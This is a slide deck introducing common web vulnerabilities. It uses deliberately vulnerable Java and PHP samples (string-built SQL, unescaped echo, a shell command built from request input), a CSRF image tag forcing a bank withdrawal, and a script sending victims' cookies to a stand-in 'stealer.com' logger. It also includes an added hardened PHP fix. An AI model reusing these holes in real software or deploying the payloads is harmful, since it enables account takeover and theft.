Web Vulnerabilities for Pros!

Stuff we are gonna cover!

  1. SQLI
  2. XSS
  3. CSRF
  4. Remote Code execution
  5. Arbitrary file upload vulnerability
  6. Session stealing

Why?

Web applications are much easier to exploit than attacking the server directly...

Plus, we all know there are a lot of sucky devs out there we can rely upon.

SQLI

SQL Injection is a technique for inserting malicious SQL into a poorly validated input field so that the database executes it as part of the application's own query.

Sony had this vulnerability.

import java.sql.*;

// Make connection to DB
Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);
String Username = request.getParameter("USER");         // From HTTP request
String Password = request.getParameter("PASSWORD");     // From HTTP request
int iUserID = -1;
String sLoggedUser = "";
// Untrusted request parameters are concatenated straight into the SQL text:
// this string building is the injection point.
String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" + Username
           + "' AND Password = '" + Password + "'";

Statement selectStatement = connection.createStatement();
ResultSet resultSet = selectStatement.executeQuery(sel);

if (resultSet.next()) {
    iUserID = resultSet.getInt(1);
    sLoggedUser = resultSet.getString(2);
}

XSS

Cross-Site Scripting, also known as XSS, is a popular type of client-side attack. It allows an attacker to inject client-side scripts of their choosing into web pages viewed by other users.

CIA had this vulnerability.

<html>
<body>
<p>Data Entered:</p>
<?php
if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}

// $data is echoed without HTML-encoding it, so whatever the request carries
// (including <script> tags) lands in the page as markup.
echo "<i>$data</i>";

?>
</body>
</html>

CSRF

Fairly new. It is a type of exploit in which a website the user visits sends unauthorized commands, on the user's behalf, to a website that the user trusts.

<html>
<body>
<h1>Welcome to this page.</h1>
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
</body>
</html>

How would you CSRF a POST request?

Google was vulnerable to CSRF!

Remote Code Execution

Probably introduced by super lazy developers with very little knowledge about security.

If you try to use a system call somewhere in your webapp's code without properly sanitizing the input, you'll end up screwing yourself over. Isn't that f***ing obvious?

<html>
<body>
<p>File Contents:</p>
<?php
	echo "<pre>";
	// The request parameter is passed straight into a shell command line:
	// this is the command injection point.
	system("cat " . $_GET['filename']);
	echo "</pre>";
?>
</body>
</html>
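As an added example (not code from the original slides), here is a hardened version of the "File Contents" page that fixes both problems shown above: it never builds a shell command from the request, serves only allowlisted basenames from one fixed directory, and HTML-encodes what it echoes, which is also the fix the XSS slide's `echo` needs. The directory name, the allowlist rule and the parameter name are assumptions.

```php
<?php
// Added example, not from the original slides: a hardened rewrite of the
// "File Contents" page. User input never reaches a shell, only allowlisted
// basenames inside a fixed directory are served, and the output is HTML-encoded
// so file contents cannot inject script (the same fix the XSS slide needs).
// FILE_DIR and the request parameter name are assumptions for this example.
declare(strict_types=1);

const FILE_DIR = __DIR__ . '/public_files';   // assumption: the only readable directory

/**
 * Map a user-supplied name to a regular file inside FILE_DIR, or return null.
 * Rejects anything that is not a plain basename and anything whose resolved
 * path (symlinks included) lies outside the directory.
 */
function resolveSafePath(string $name): ?string
{
    // Plain basenames only: must start alphanumeric, so "." and ".." never match.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $name)) {
        return null;
    }
    $base = realpath(FILE_DIR);
    $path = realpath(FILE_DIR . '/' . $name);   // false if the file does not exist
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

/** HTML-encode untrusted text before placing it in the page body. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$name = $_GET['filename'] ?? '';
$path = is_string($name) ? resolveSafePath($name) : null;
?>
<html>
<body>
<p>File Contents:</p>
<?php if ($path === null): ?>
<pre>No such file.</pre>
<?php else: ?>
<pre><?= h(file_get_contents($path) ?: '') ?></pre>
<?php endif; ?>
</body>
</html>
```

Requests such as `?filename=../../etc/passwd` or `?filename=x;id` are rejected by the basename check before any file system call, and a file containing `<script>` is rendered as text rather than executed.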

Arbitrary file upload vulnerability

Allowing files to be uploaded without checking their type or extension.

Finding such vulnerability in your webapp is "GGWP" for the hacker.

The hacker after finding this will upload a PHP shell and rip your server apart.

Anonymous, the hacking group's website, had this vulnerability.

Session stealing...

It's not a separate vulnerability but the use of persistent XSS to get something useful.

<script type="text/javascript">
// Sends the victim's cookies to the attacker's logger; cookies flagged HttpOnly
// are not exposed through document.cookie and would not be included.
document.location="http://www.stealer.com/cookielogger.php?cookie=" + document.cookie;
</script>

Hint:

Makes sense?

Made with Slides.com